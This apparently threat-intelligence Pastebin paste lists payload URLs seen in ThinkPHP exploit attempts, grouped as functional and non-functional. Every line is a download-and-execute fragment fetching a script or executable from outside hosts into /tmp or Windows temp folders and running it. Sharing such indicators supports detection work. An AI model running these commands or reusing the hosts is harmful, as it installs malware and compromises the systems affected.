Advertisement
internetweather

Recent ThinkPHP exploit payload URLs

Mar 14th, 2019
260
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 3.51 KB | None | 0 0
  1. # Functional payload URLs for ThinkPHP exploits detected
  2. http://82.212.70.218/a_thk.sh -O /tmp/a; chmod 0777 /tmp/a; /tmp/a;
  3. http://86.105.49.215/a.sh -O /tmp/a; chmod 0777 /tmp/a; /tmp/a;
  4. http://fid.hognoob.se/download.exe','C:/Windows/temp/aeanqfnpfvxzrkv26348.exe');start C:/Windows/temp/aeanqfnpfvxzrkv26348.exe
  5. http://fid.hognoob.se/download.exe','C:/Windows/temp/gmfdsduurcahbsh17282.exe');start C:/Windows/temp/gmfdsduurcahbsh17282.exe
  6. http://fid.hognoob.se/download.exe','C:/Windows/temp/gqxkmimhtxtvrnj13781.exe');start C:/Windows/temp/gqxkmimhtxtvrnj13781.exe
  7. http://fid.hognoob.se/download.exe','C:/Windows/temp/hdxgzsldxrjtxch17953.exe');start C:/Windows/temp/hdxgzsldxrjtxch17953.exe
  8. http://fid.hognoob.se/download.exe','C:/Windows/temp/iiqpccjjmjjpoux8275.exe');start C:/Windows/temp/iiqpccjjmjjpoux8275.exe
  9. http://fid.hognoob.se/download.exe','C:/Windows/temp/jrrojigvihebyol17813.exe');start C:/Windows/temp/jrrojigvihebyol17813.exe
  10. http://fid.hognoob.se/download.exe','C:/Windows/temp/kuqsghgrmkcsxnm21951.exe');start C:/Windows/temp/kuqsghgrmkcsxnm21951.exe
  11. http://fid.hognoob.se/download.exe','C:/Windows/temp/lcnetkdntjwmjay7449.exe');start C:/Windows/temp/lcnetkdntjwmjay7449.exe
  12. http://fid.hognoob.se/download.exe','C:/Windows/temp/lgaxyggezatjfsb11135.exe');start C:/Windows/temp/lgaxyggezatjfsb11135.exe
  13. http://fid.hognoob.se/download.exe','C:/Windows/temp/lznqcoanzlxihhf1788.exe');start C:/Windows/temp/lznqcoanzlxihhf1788.exe
  14. http://fid.hognoob.se/download.exe','C:/Windows/temp/mppnlkwacozkwvg23106.exe');start C:/Windows/temp/mppnlkwacozkwvg23106.exe
  15. http://fid.hognoob.se/download.exe','C:/Windows/temp/npkokqlyyrlyfmz30714.exe');start C:/Windows/temp/npkokqlyyrlyfmz30714.exe
  16. http://fid.hognoob.se/download.exe','C:/Windows/temp/qfutrylkndixdti26488.exe');start C:/Windows/temp/qfutrylkndixdti26488.exe
  17. http://fid.hognoob.se/download.exe','C:/Windows/temp/raatxiklntxqphv6333.exe');start C:/Windows/temp/raatxiklntxqphv6333.exe
  18. http://fid.hognoob.se/download.exe','C:/Windows/temp/rrzhwyrfxcbmkvt29580.exe');start C:/Windows/temp/rrzhwyrfxcbmkvt29580.exe
  19. http://fid.hognoob.se/download.exe','C:/Windows/temp/rxezoavvrkhbyoy8592.exe');start C:/Windows/temp/rxezoavvrkhbyoy8592.exe
  20. http://fid.hognoob.se/download.exe','C:/Windows/temp/stuxlmcffcskxkn735.exe');start C:/Windows/temp/stuxlmcffcskxkn735.exe
  21. http://fid.hognoob.se/download.exe','C:/Windows/temp/tppbstrpcbalxvh31008.exe');start C:/Windows/temp/tppbstrpcbalxvh31008.exe
  22. http://fid.hognoob.se/download.exe','C:/Windows/temp/vsrkyociqmlapkr11461.exe');start C:/Windows/temp/vsrkyociqmlapkr11461.exe
  23. http://fid.hognoob.se/download.exe','C:/Windows/temp/vycbhgxpztfdiif10360.exe');start C:/Windows/temp/vycbhgxpztfdiif10360.exe
  24. http://fid.hognoob.se/download.exe','C:/Windows/temp/wbqgksmvhubjyvp19072.exe');start C:/Windows/temp/wbqgksmvhubjyvp19072.exe
  25. http://fid.hognoob.se/download.exe','C:/Windows/temp/xsutfrdnmlonkjt15003.exe');start C:/Windows/temp/xsutfrdnmlonkjt15003.exe
  26. http://a46.bulehero.in/download.exe','C:/11.exe');start C:/11.exe
  27. http://a46.bulehero.in/download.exe','C:/13.exe');start C:/13.exe
  28. http://a46.bulehero.in/download.exe','C:/15.exe');start C:/15.exe
  29. http://a46.bulehero.in/download.exe','C:/6.exe');start C:/6.exe
  30. http://a46.bulehero.in/download.exe','C:/9.exe');start C:/9.exe
  31.  
  32. # Non-functional payload URLs
  33. http://fuckyou.com/fuckyou.exe','C:/7.exe');start C:/7.exe
  34. http://fuckyou.com/fuckyou.exe','C:/8.exe');start C:/8.exe
  35. http://fffffff.ff/download.exe','C:/5.exe');start C:/5.exe
  36. http://fffffff.ff/download.exe','C:/8.exe');start C:/8.exe
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement